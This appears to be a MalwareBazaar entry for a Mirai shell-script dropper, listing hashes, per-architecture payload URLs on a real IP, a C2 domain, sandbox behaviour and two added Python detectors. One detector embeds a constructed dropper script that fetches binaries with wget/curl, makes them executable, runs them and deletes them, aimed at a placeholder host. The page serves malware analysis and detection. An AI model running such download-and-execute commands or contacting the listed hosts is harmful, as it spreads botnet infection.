MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b7bfaf45eef40e028b2ad7086d113547c7d7514b3f5e93ff4d6d9554a46bc6dc. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 8



SHA256 hash: b7bfaf45eef40e028b2ad7086d113547c7d7514b3f5e93ff4d6d9554a46bc6dc
SHA3-384 hash: a62a7e1d31d47a6fbb82b9b389afcac051932a133cf7e4019dc4ecd0be24e2a5b4208bd42976b8a482a6c5806bb676f4
SHA1 hash: 4b928efa4a46236199f4e05bf873453b8874117f
MD5 hash: 9ae1c3fecf8c6b1e8f90775af7a8f9c1
humanhash: white-kentucky-april-don
File name: 1.sh
Signature: Mirai
File size: 3'164 bytes
First seen: 2025-11-19 22:01:50 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 48:ioldGVsD+vRoUUPFyR8nJhL4VLAJPNGM/2uN6:ioldGVsD+vRoUUPFyR04VLiPNGMD6
TLSH: T1945184BA014407706CE26BD7637E804C3191929749F6BF26A7ED28E88D8DFDCBC41667
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://41.216.189.88/00101010101001/S3o.x86 | 5569bf3426d939b9fd9f33f275e86f1e78faf9a157cc6aa803aef1f3df7db933 | Mirai | elf geofenced mirai opendir ua-wget USA x86
http://41.216.189.88/00101010101001/S3o.mips | cf65e78b52b19e3ac5a1a3f10f571a60fd11b47a72e47e54bad00dcc10624166 | Mirai | elf geofenced mips mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arc | 44b6c1d1e7526a23c24fa5f7cb939015f40c5cb722b4e879e89ed9a63b6db212 | Mirai | arc elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.i468 | n/a | n/a | elf ua-wget
http://41.216.189.88/00101010101001/S3o.i686 | 6b8dbe5cea96bfaa75c318614b27fd139f5aba3d7ef63181dc939fa0fd2ce10e | Mirai | elf geofenced mirai opendir ua-wget USA x86
http://41.216.189.88/00101010101001/S3o.x86_64 | d3cf20462308c14ecdae9a05a63526cf586de84f919e6b6a380834d98afdc17e | Mirai | elf geofenced mirai opendir ua-wget USA x86
http://41.216.189.88/00101010101001/S3o.mpsl | b2a9a313364beca9f0c8ca3bfa4309d39b836a0852cf7953ce379353983f28ba | Mirai | elf geofenced mips mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arm | ab2941f4781a5fdff78181e878fe8b065e5decd73a1949a99b12b724934cde58 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arm5 | 55270354a25e6f143ab99369d1e5129dd6a9f629924aea60f59e520b79cdb4ce | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arm6 | 6aea4b3f8dd415b9716ee71775fd0706098e6a3d8dea933f0ed77343082a3125 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.arm7 | b5ad80ac7cba318becb4dec3b9b8ed907de90a28788a8b32cc925eed7ca5f17b | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.ppc | 0e7ff0d9b6a39fc2196676905c970f18c7c48b88f39c7568d230b07c28b70f44 | Mirai | elf geofenced mirai opendir PowerPC ua-wget USA
http://41.216.189.88/00101010101001/S3o.spc | 662cb3f68599553021643f28a830300a3abb6b8b977225b834e93282b5f38a78 | Mirai | elf geofenced mirai opendir sparc ua-wget USA
http://41.216.189.88/00101010101001/S3o.m68k | e9a1cb2b8cf0c4a1eb4948e6a336fc2a56257c4a65fa00a28ed50c98b02cfa74 | Mirai | elf geofenced m68k mirai opendir ua-wget USA
http://41.216.189.88/00101010101001/S3o.sh4 | 2580a0151f1ddf68044938a1c2e65fe3d39f916d902598fd88970ea48988a393 | Mirai | elf geofenced mirai opendir SuperH ua-wget USA

Intelligence


File Origin
# of uploads: 1
# of downloads: 50
Origin country: DE
Vendor Threat Intelligence
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox evasive
Verdict: Malicious
File Type: unix shell
First seen: 2025-11-19T19:29:00Z UTC
Last seen: 2025-11-21T06:56:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (sandbox process tree, summarised from the graph export):
/usr/bin/sudo (pid 3250) execve → /tmp/sample.bin (pid 3254), the dropper script.
pid 3254 first runs /usr/bin/cp, then repeats one cycle per architecture: /usr/bin/wget (net, send-data, write-file) → /usr/bin/curl (net, send-data, write-file) → /usr/bin/chmod → either execve of the dropped binary (/tmp/S3o.x86 pid 3321; /tmp/S3o.i686 pid 4179; /tmp/S3o.x86_64 pid 4626, flagged mprotect-exec) or a cloned /usr/bin/bash → /usr/bin/rm (delete-file).
Network: the first wget (pid 3272) and curl (pid 3298) send 150 B and 99 B to 41.216.189.88:80; every later wget/curl pair sends about 150 B / 100 B to vcute69.bounceme.net:80.
/tmp/S3o.x86 (pid 3321) connects to 8.8.8.8:53 and clones children (pids 3323, 3915, 3916). Grandchild pid 3326 (dns, net, send-data, zombie) sends 38 B to 8.8.8.8:53 and 13 B to vcute69.bounceme.net:12121; child pid 3916 (net, send-data, zombie) sends 195 B to 8.8.8.8:53 and 13 B to vcute69.bounceme.net:80.
/tmp/S3o.i686 (pid 4179) and /tmp/S3o.x86_64 (pid 4626) each connect to 8.8.8.8:53 and to 0.0.0.0:12121.
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-11-19 22:02:34 UTC
File Type: Text (Shell)
AV detection: 20 of 36 (55.56%)
Threat level: 3/5
Result
Malware family:
Score: 10/10
Tags: family:mirai antivm botnet defense_evasion discovery linux upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Malware Config
C2 Extraction: vcute69.bounceme.net
Please note that we are no longer able to provide a coverage score for Virus Total.
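The fetch → chmod → execute → delete cycle that the sandbox graph and the Behaviour list above record becomes easy to spot once process events are keyed by parent pid and dropped path: the downloader writes a file on behalf of its parent, the same parent later executes that path, and rm removes it. The detector below is an added example written for this page, not vendor or sandbox code. Its event stream is constructed to mirror the graph; 198.51.100.7 and c2.example.invalid are placeholders standing in for the distribution host and C2 named on the page, and the field names of Event are this example's own.

```python
"""Detect the fetch -> execute -> delete dropper chain seen in the sandbox graph.

Added example for this MalwareBazaar page; the telemetry below is constructed
to mirror the graph (wget/curl write under /tmp, the parent shell executes the
file, rm deletes it) and is not real sandbox output.
"""
from dataclasses import dataclass

# Processes whose file writes count as a network fetch (assumed image paths).
DOWNLOADERS = {"/usr/bin/wget", "/usr/bin/curl", "/bin/busybox"}


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    image: str            # executable path of the process
    writes: tuple = ()    # files it wrote   (sandbox "write-file")
    deletes: tuple = ()   # files it removed (sandbox "delete-file")
    remote: str = ""      # "host:port" it contacted, if any


# Constructed telemetry: placeholders 198.51.100.7 (distribution host) and
# c2.example.invalid (C2) stand in for the real endpoints on the page.
SAMPLE_EVENTS = (
    Event(3254, 3250, "/tmp/sample.bin"),
    Event(3272, 3254, "/usr/bin/wget", writes=("/tmp/S3o.x86",), remote="198.51.100.7:80"),
    Event(3298, 3254, "/usr/bin/curl", writes=("/tmp/S3o.x86",), remote="198.51.100.7:80"),
    Event(3319, 3254, "/usr/bin/chmod"),
    Event(3321, 3254, "/tmp/S3o.x86"),                    # parent executes the drop
    Event(3323, 3321, "/tmp/S3o.x86"),                    # payload forks ...
    Event(3326, 3323, "/tmp/S3o.x86", remote="c2.example.invalid:12121"),  # ... grandchild beacons
    Event(3917, 3254, "/usr/bin/rm", deletes=("/tmp/S3o.x86",)),
    # Next architecture: fetched and removed but never run (wrong CPU for this host).
    Event(3918, 3254, "/usr/bin/wget", writes=("/tmp/S3o.mips",), remote="198.51.100.7:80"),
    Event(3974, 3254, "/usr/bin/chmod"),
    Event(3980, 3254, "/usr/bin/rm", deletes=("/tmp/S3o.mips",)),
    # Unrelated write by a package manager: no downloader/exec relation, must not fire.
    Event(5000, 1, "/usr/bin/apt", writes=("/var/cache/apt/archives/x.deb",)),
)


def detect_dropper_chains(events):
    """One finding per (parent pid, path) that a downloader wrote.

    Records whether the same parent later executed the file, whether it was
    deleted afterwards, and which remote endpoints the executed payload or any
    of its descendants contacted.
    """
    findings = {}   # (ppid, path) -> finding
    lineage = {}    # pid -> key of the executed payload it descends from
    for ev in events:
        # Stage 1: a downloader writes a file on behalf of its parent.
        if ev.image in DOWNLOADERS:
            for path in ev.writes:
                f = findings.setdefault((ev.ppid, path), {
                    "parent_pid": ev.ppid, "path": path, "sources": set(),
                    "executed": False, "deleted": False, "c2": set()})
                if ev.remote:
                    f["sources"].add(ev.remote)
        # Stage 2: the same parent executes that path.
        key = (ev.ppid, ev.image)
        if key in findings:
            findings[key]["executed"] = True
            lineage[ev.pid] = key
        elif ev.ppid in lineage:          # forks/clones of the payload
            lineage[ev.pid] = lineage[ev.ppid]
        if ev.pid in lineage and ev.remote:
            findings[lineage[ev.pid]]["c2"].add(ev.remote)
        # Stage 3: the parent removes the file to hide the drop.
        for path in ev.deletes:
            if (ev.ppid, path) in findings:
                findings[(ev.ppid, path)]["deleted"] = True
    for f in findings.values():
        if f["executed"]:
            f["verdict"] = "dropper chain: fetched, executed, " + (
                "deleted" if f["deleted"] else "left on disk")
        elif f["deleted"]:
            f["verdict"] = "fetched and deleted without execution (multi-arch spray?)"
        else:
            f["verdict"] = "fetched only"
    return sorted(findings.values(), key=lambda f: f["path"])


def finding_for(path, events=SAMPLE_EVENTS):
    """Look up one finding by dropped path (None if no downloader wrote it)."""
    return next((f for f in detect_dropper_chains(events) if f["path"] == path), None)


if __name__ == "__main__":
    for f in detect_dropper_chains(SAMPLE_EVENTS):
        print(f["path"], "|", f["verdict"], "| c2:", sorted(f["c2"]))
```

The keying on (parent, path) is what separates a genuine drop from a package manager writing a file: without a downloader-then-execute relation under one parent, nothing fires. The fetched-and-deleted-but-never-executed case is worth reporting on its own, because a multi-architecture spray like the one in the URL table above leaves exactly that residue for every binary that did not match the host CPU.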

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders
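The rule above is described only as a generic approach, and its text is not on this page. The triage below is an added example of what such a generic heuristic looks like in code; it is not the YARA rule, not the contents of 1.sh, and the two scripts it runs over are constructed (the dropper mimics the wget/curl, chmod, execute, rm pattern recorded in the sandbox graph, with 198.51.100.7 as a documentation-range placeholder for the distribution host). It extracts the fetch URLs and dropped file names, notes which architectures are targeted, and scores the downloader indicators.

```python
"""Static triage of a shell-script downloader (generic heuristic, added example).

Not the Linux_Shellscript_Downloader YARA rule and not the sample's own text:
both scripts below are constructed, with 198.51.100.7 as a placeholder host.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s'"<>|;&)]+""")
FETCH_RE = re.compile(r"\b(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")       # chmod +x / 777 / 755 ...
EXEC_RE = re.compile(r"(?:^|[;&|(]\s*)\./([^\s;&|)]+)", re.M)    # ./file run from cwd
RM_RE = re.compile(r"\brm\s+-(?:rf|fr|f)\b")
CD_CHAIN_RE = re.compile(r"\bcd\s+\S+\s*\|\|\s*cd\s+\S+")          # cd /tmp || cd /var/run ...
ARCH_RE = re.compile(r"\.(x86_64|x86|i686|mips|mpsl|arm[4567]?|ppc|spc|sparc|m68k|sh4|arc)$")

WEIGHTS = {"fetch": 1, "chmod_exec": 2, "exec_relative": 2, "self_delete": 1,
           "cd_fallback_chain": 1, "busybox": 1, "multi_arch": 2}

# Constructed dropper in the style the sandbox graph records (two architectures shown).
DROPPER_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.7/bins/S3o.x86 -O S3o.x86 || curl -o S3o.x86 http://198.51.100.7/bins/S3o.x86
chmod 777 S3o.x86; ./S3o.x86; rm -rf S3o.x86
/bin/busybox wget http://198.51.100.7/bins/S3o.mips -O S3o.mips
chmod +x S3o.mips; ./S3o.mips; rm -rf S3o.mips
"""

# Constructed benign script: fetches, but never makes anything executable or runs it.
BENIGN_SCRIPT = """#!/bin/sh
# nightly backup
tar czf /var/backups/etc.tgz /etc
curl -fsS https://status.example.invalid/ping?host=$(hostname) >/dev/null
"""


def triage_shell_script(text):
    """Extract IOCs and score downloader indicators in a shell script."""
    urls = sorted(set(URL_RE.findall(text)))
    dropped = sorted(set(EXEC_RE.findall(text)))
    arches = set()
    for u in urls:                       # architecture suffix of each fetched path
        m = ARCH_RE.search(urlparse(u).path)
        if m:
            arches.add(m.group(1))
    indicators = {
        "fetch": bool(FETCH_RE.search(text)),
        "chmod_exec": bool(CHMOD_RE.search(text)),
        "exec_relative": bool(dropped),
        "self_delete": bool(RM_RE.search(text)),
        "cd_fallback_chain": bool(CD_CHAIN_RE.search(text)),
        "busybox": "busybox" in text,
        "multi_arch": len(arches) >= 2,
    }
    score = sum(WEIGHTS[k] for k, hit in indicators.items() if hit)
    # Fetch plus execution of a relative path is the core download-and-run pattern;
    # the remaining indicators only raise confidence.
    if indicators["fetch"] and indicators["exec_relative"]:
        verdict = "shell downloader"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "no downloader pattern"
    return {"urls": urls, "dropped": dropped, "arches": sorted(arches),
            "indicators": indicators, "score": score, "verdict": verdict}


if __name__ == "__main__":
    for name, script in (("dropper", DROPPER_SCRIPT), ("benign", BENIGN_SCRIPT)):
        r = triage_shell_script(script)
        print(name, r["verdict"], r["score"], r["urls"], r["dropped"], r["arches"])
```

The extracted URLs and dropped names are the parts worth keeping: they feed straight into a block list and into the hash table of the per-architecture payloads listed above, while the score is only a ranking aid for a triage queue.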

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download | Mirai | sh | b7bfaf45eef40e028b2ad7086d113547c7d7514b3f5e93ff4d6d9554a46bc6dc (this sample)

Delivery method
Distributed via web download

Comments